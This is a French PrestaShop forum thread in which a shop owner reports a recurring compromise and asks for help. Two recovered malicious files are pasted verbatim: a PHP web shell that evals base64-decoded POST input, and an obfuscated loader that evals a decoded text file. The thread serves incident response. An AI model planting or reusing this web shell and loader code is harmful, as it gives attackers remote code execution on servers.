Récemment
-
Aperçu de l'activité dans le dashboard vide
Bugs & Améliorations29 -
Tri par code de réduction (Commandes) [RÉSOLU]
Bugs & Améliorations5 -
Uncaught Error: Call to a member function rowCount() on bool [RÉSOLU]
Bugs & Améliorations4 -
Navigation à facettes
Bugs & Améliorations8 -
Calcul des règles paniers HT/TTC [RÉSOLU]
Bugs & Améliorations44 -
Erreur lors d'une nouvelle installation depuis 0
Questions relatives à l'installation/upgrade24 -
Bug avec le module de paiement epayment
Bugs & Améliorations2 -
Changement statut de commande [RÉSOLU]
Bugs & Améliorations3 -
Prévisions sur le tableau de bord vide [RÉSOLU]
Bugs & Améliorations8 -
Nouvelle attaque ?
Discussion générale10 -
À partir de (from_price) [RÉSOLU]
Bugs & Améliorations11 -
Override AdminCustomersController [RÉSOLU]
Bugs & Améliorations11 -
Logo Phenix erreur 404 en BO
Bugs & Améliorations8 -
Bug Preventing eMail Delivery in at least 1.6.2.16 up to 1.6.2.19 (Probably much more)
Bugs & Améliorations3 -
1.6.2.19 - Erreur sur le module Editeur de page d'accueil
Bugs & Améliorations4 -
warning SQL ( debug activé ) dans Search.php
PhenixSuite6 -
Module PSitechecklist Facilitez la compréhension des retours clients.
Modules1 -
module moneticoPaiement
PhenixSuite2 -
Copieurs-Colleurs
Discussion générale3 -
règle prix catalogue et mise à jour panier
Bugs & Améliorations7
Nouvelle attaque ?
-
Bonjour à tous,
Je constate sur mon presta certaines modifications anormales, en tout cas non souhaitées qui me laisse penser à une attaque.
Voici en quelques mots ce que j'ai pu observer :
Modification du htaccess
Creation de fichiers 1.mcm.x86_64, confcom.php, conf.php, lowpr.php,...
Malgré la suppression des fichiers indésirables et le rétablissement du htaccess, cela revient régulièrement.
J'ai passé le scan de sécurité cleaner.php de @eolia qui ne détecte pas de virus.
Quelqu'un a-t-il été confronté à cela auparavant ? Et si oui, quelles sont les actions à mener ?Merci pour vos réponses.
-
Quelle version de Presta ?
-
Désolé pour l'oubli : il s'agit de 1.7.2.4
-
Avant que vous ne supprimiez quoi que ce soit, Cleaner ne trouve rien ?
-
Non !
Il y a bien des alertes de modification mais après vérification, c'est normal.
Aucune modification en rouge.
-
il y a quoi dans les fichiers que vous avez supprimé ?
-
Le fichier 1.mcm.x86_64 est trop long pour être transmis tel quel.
Le fichier confcom.php est vide
Le fichier conf.php est le suivant :
<!DOCTYPE html>
<html>
<head>
<title>PHP command</title>
</head>
<body>
<form method="post" action="">
<input type="text" name="php" id="php">
<input type="submit" value="Execute">
</form>
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$php = $_POST['php'];
$php = strtr($php, '-', '=');
$php = base64_decode($php);
if($php) {
$result = eval($php);
echo $result;
}
}
?>
</body>
</html>Le fichier lowpr.php est le suivant :
<?php
$table_prefix = "wbzaxsye6w4_duevcwondme";
$table_prefix = str_replace(array("z", "x", "y", "u", "v", "w", "n", "m"), "", $table_prefix);
$txt_contents = "1f2i3l4e5_6g7e8t9_0c1o2n3t4e5n6t7s8";
$txt_contents = preg_replace("/\d+/", "", $txt_contents);
$wp_content = $txt_contents("lowpr".".txt");
eval/Designed with utility, safety and style/($table_prefix($wp_content));
?>J'espère que cela vous donnera des idées car je suis pas compétent !
Merci par avance
-
Bah je ne comprends pas que Cleaner ne les trouve pas avec de telles fonctions à l'intérieur. (eval() par exemple)
-
J'ai oublié : j'ai passé cleaner.php après avoir supprimé les fichiers ...
Cela ne change rien dans les faits car ils reviennent ce qui signifie que l'infection vient d'un autre fichier ou d'une faille qui, lui /elle n'a pas été détecté ...
-
Par contre il faut comprendre les limites du système.
La version 1.7 c'est plus d'un million de lignes de code (contre 300 000 pour les 1.6) et cleaner ne peut pas scanner tous les fichiers/répertoires surtout que j'ai arrêté de suivre leurs évolutions.
Un autre élément à contrôler: pas d'autres CMS sur le même hébergement (WordPress ou autre) ni de répertoires inconnus (créés par vous et non-scannés) ?